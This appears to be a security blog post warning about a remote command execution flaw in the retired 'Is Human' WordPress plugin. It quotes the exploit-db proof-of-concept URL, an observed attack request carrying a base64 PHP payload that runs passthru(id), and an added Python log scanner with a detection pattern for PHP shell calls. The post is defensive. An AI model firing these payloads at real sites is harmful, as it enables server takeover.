Take the “Is Human” WordPress plugin, for example.
It’s no longer available for download, no longer supported by its developers, and yet cybercriminals are still scanning websites hoping that someone still has it installed.
Why? Because versions 1.4.2 and earlier suffer from a remote command execution vulnerability. Below is a write-up from the corresponding exploit-db entry:
The vulnerability exists in /is-human/engine.php.
It is possible to take control of the eval() function via the 'type' parameter, when the 'action' is set to log-reset. From here we can run our own code.
In order to avoid any errors we point the $is_hum->get_* array variable into $is_hum->get_ih and to close the execution without error we point it to php stored function error_log(). In between we may place our own php code and use the passthru() function to execute commands.
Execution running the linux whoami command:
http://server/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();passthru(whoami);error
We recently saw attempts to exploit this vulnerability against our website, all of which failed because we don't use this plugin (and the requests used the wrong file path anyway). All of the attempts originated from the same U.S.-based IP address:
/blog/2013/02/01/hackers-still-scanning-for-vulnerable-timthumb-scripts/wp-content/plugins/is-human/engine.php?action=log-reset&error&eval(base64_decode(JHM9cGhwX3VuYW1lKCk7CmVjaG8gJzxicj4nLiRzOwoKZWNobyAnPGJyPic7CnBhc3N0aHJ1KGlkKTsK))&type=ih_options()
The base64-decoded text is:
$s=php_uname();
echo '<br>'.$s;
echo '<br>';
passthru(id);
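Detection logic a site owner could run over a web-server access log to spot the requests described above, added here as an example and not part of the original post: it flags log-reset requests to the plugin's engine.php whose 'type' value or parameter names carry PHP code, and decodes any base64_decode() argument so the payload can be read. The log lines are constructed (the first reuses the request quoted above, the last the exploit-db proof of concept) and the format is assumed to be Apache/nginx combined log format.

```python
import base64
import binascii
import re
from urllib.parse import unquote, urlsplit

# Combined log format (Apache/nginx): client IP, request line, status code.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<url>\S+) [^"]*" (?P<status>\d{3})')
# PHP calls that never belong in a legitimate 'type' value or parameter name.
PHP_CALL_RE = re.compile(r"\b(eval|passthru|system|shell_exec|exec|base64_decode)\s*\(", re.I)
B64_ARG_RE = re.compile(r"base64_decode\(\s*([A-Za-z0-9+/=]+)\s*\)")
# Constructed sample log: the request this post saw, an ordinary page view, and
# the exploit-db proof-of-concept request; both attack lines got a 404 here.
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Feb/2013:10:15:32 +0000] "GET /blog/2013/02/01/hackers-still-scanning-for-vulnerable-timthumb-scripts/wp-content/plugins/is-human/engine.php'
    '?action=log-reset&error&eval(base64_decode(JHM9cGhwX3VuYW1lKCk7CmVjaG8gJzxicj4nLiRzOwoKZWNobyAnPGJyPic7CnBhc3N0aHJ1KGlkKTsK))&type=ih_options() HTTP/1.1" 404 3112',
    '198.51.100.4 - - [05/Feb/2013:10:16:01 +0000] "GET /blog/2013/02/01/hackers-still-scanning-for-vulnerable-timthumb-scripts/ HTTP/1.1" 200 15234',
    '203.0.113.7 - - [05/Feb/2013:10:16:40 +0000] "GET /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();passthru(whoami);error HTTP/1.1" 404 3112',
]

def inspect_request(url):
    # Returns a finding for an is-human log-reset injection attempt, else None.
    parts = urlsplit(url)
    if not parts.path.endswith("/wp-content/plugins/is-human/engine.php"):  # script named in the advisory
        return None
    # Split on '&' only: the exploit string carries ';' inside the 'type' value.
    params = dict(map(unquote, p.partition("=")[::2]) for p in parts.query.split("&"))
    if params.get("action") != "log-reset":
        return None
    injected = [k for k in params if PHP_CALL_RE.search(k)]  # code smuggled in as a key
    type_value = params.get("type", "")
    if PHP_CALL_RE.search(type_value) or re.search(r"[;()]", type_value):
        injected.append("type=" + type_value)  # code that reaches eval() via 'type'
    if not injected:
        return None
    decoded = []
    for blob in B64_ARG_RE.findall(parts.query):  # reveal base64-wrapped payloads
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            decoded.append("<undecodable base64>")
    return {"injected": injected, "decoded": decoded}

def scan_access_log(lines):
    # Returns (client_ip, status, finding) for every log line that is an attempt.
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        finding = inspect_request(m.group("url")) if m else None
        if finding:
            hits.append((m.group("ip"), int(m.group("status")), finding))
    return hits
```

Run `scan_access_log` over your own access log lines; a hit with a 200 status, rather than the 404s above, means the vulnerable script was actually reached and the host should be treated as compromised.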
Obviously this post serves as a warning to anyone who may still have this plugin installed on their WordPress website. Cybercriminals will attempt to exploit any vulnerability – old or new – to cause mischief and mayhem.
WordPress is a popular CMS, and it’s important that anyone running it keeps the platform and any installed plugins up-to-date.